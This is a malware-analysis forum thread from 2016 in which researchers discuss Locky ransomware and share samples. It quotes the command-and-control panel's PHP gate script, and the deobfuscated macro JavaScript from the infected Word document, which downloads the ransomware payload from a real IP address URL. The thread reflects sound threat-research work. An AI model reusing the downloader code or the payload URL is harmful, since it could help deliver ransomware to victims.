Locky ransomware

Forum for analysis and discussion about malware.

Locky ransomware

Postby Blaze » Wed Feb 17, 2016 4:48 pm

You do not have the required permissions to view the files attached to this post.
Follow me on Twitter: @bartblaze
User avatar
Blaze
 
Posts: 198
Joined: Fri Aug 27, 2010 7:35 am
Reputation point: 71

Re: Locky ransomware

Postby maddog4012 » Wed Feb 17, 2016 7:42 pm

this malware is dropped from a word doc that arrives in E-mail
You do not have the required permissions to view the files attached to this post.
User avatar
maddog4012
 
Posts: 43
Joined: Mon Aug 04, 2014 6:53 pm
Reputation point: 35

Re: Locky ransomware

Postby benkow_ » Thu Feb 18, 2016 8:49 am

Not really usefull but during some minutes, the panel server has some problem and we was been able to download php files.
gates: (main.php)
Code: Select all
<?php
declare(strict_types=1);
require_once(__DIR__.'/settings.php');
require_once(__DIR__.'/functions.php');

if (!isset($_SERVER['REQUEST_METHOD']) || $_SERVER['REQUEST_METHOD'] != 'POST') exit_error(404);
if (!($data = @file_get_contents('php://input'))) exit_error(404);
parse_str(decrypt_bot_request($data), $_POST);
if (empty($_POST['id']) || empty($_POST['act'])) exit_error(404);
$id = get_id();

/*
$data = print_r($_POST, true);
$fh = fopen('ppplog', 'a');
fwrite($fh, $data."\n----------------------------\n");
fclose($fh);
*/

$script = __DIR__.'/actions/'.trim(basename($_POST['act'])).'.php';
if (!@file_exists($script)) exit_error(404);
require_once($script);
?>
benkow_
 
Posts: 69
Joined: Sat Jan 24, 2015 12:14 pm
Reputation point: 41

Re: Locky ransomware

Postby eli » Thu Feb 18, 2016 12:43 pm

Seems like it stopped working. Servers taken down?
eli
 
Posts: 1
Joined: Wed Feb 10, 2016 12:48 pm
Reputation point: 0

Re: Locky ransomware

Postby frank_boldewin » Tue Feb 23, 2016 4:23 pm

eli wrote:Seems like it stopped working. Servers taken down?


maddog4012's doc file starts a macro with some ofuscated vb-code and decodes to following code:

Code: Select all
function downloadToFile(url,file)
{
   var xhr=new ActiveXObject("msxml2.xmlhttp");
   ado=new ActiveXObject("ADODB.Stream");
   xhr.open("GET",url,false);
   xhr.send();
   if(xhr.status===200)
   {
      ado.type=1;
      ado.open();
      ado.write(xhr.responseBody);
      ado.saveToFile(file);
      ado.close();
      return xhr.responseBody;
   }
}

downloadToFile('http://66.133.129.5/~chuckgilbert/09u8h76f/65fg67n',fundamentally);


The executable can still be downloaded.
User avatar
frank_boldewin
 
Posts: 115
Joined: Thu Apr 22, 2010 8:59 am
Location: germany
Reputation point: 89

Re: Locky ransomware

Postby frank_boldewin » Wed Feb 24, 2016 2:14 pm

Just in case one is interested. attached is an unpacked version of locky.
You do not have the required permissions to view the files attached to this post.
User avatar
frank_boldewin
 
Posts: 115
Joined: Thu Apr 22, 2010 8:59 am
Location: germany
Reputation point: 89

Re: Locky ransomware

Postby w0rm » Wed Feb 24, 2016 5:38 pm

There seems to be a version with a new DGA but I don't have access to the sample. Can anyone retrieve it?

73304ca4e455286b7a63ed71af48390a

Bonus points for unpacked =)
w0rm
 
Posts: 1
Joined: Mon Apr 21, 2014 4:09 pm
Reputation point: 0

Re: Locky ransomware

Postby Xylitol » Wed Feb 24, 2016 6:27 pm

in attachment.
You do not have the required permissions to view the files attached to this post.
User avatar
Xylitol
Global Moderator
 
Posts: 1629
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 485

Re: Locky ransomware

Postby FafZee » Thu Feb 25, 2016 8:37 am

Unpacked in attachment
You do not have the required permissions to view the files attached to this post.
FafZee
 
Posts: 24
Joined: Tue Mar 19, 2013 11:08 am
Reputation point: 14

Re: Locky ransomware

Postby p1nk » Fri Feb 26, 2016 7:12 am

benkow_ wrote:Not really usefull but during some minutes, the panel server has some problem and we was been able to download php files.
gates: (main.php)
Code: Select all
<?php
declare(strict_types=1);
require_once(__DIR__.'/settings.php');
require_once(__DIR__.'/functions.php');

if (!isset($_SERVER['REQUEST_METHOD']) || $_SERVER['REQUEST_METHOD'] != 'POST') exit_error(404);
if (!($data = @file_get_contents('php://input'))) exit_error(404);
parse_str(decrypt_bot_request($data), $_POST);
if (empty($_POST['id']) || empty($_POST['act'])) exit_error(404);
$id = get_id();

/*
$data = print_r($_POST, true);
$fh = fopen('ppplog', 'a');
fwrite($fh, $data."\n----------------------------\n");
fclose($fh);
*/

$script = __DIR__.'/actions/'.trim(basename($_POST['act'])).'.php';
if (!@file_exists($script)) exit_error(404);
require_once($script);
?>



Do you have an archive of all the collected PHP pages?
User avatar
p1nk
 
Posts: 39
Joined: Thu Oct 29, 2015 1:09 am
Reputation point: 2

Next

Return to Malware

Who is online

Users browsing this forum: No registered users and 13 guests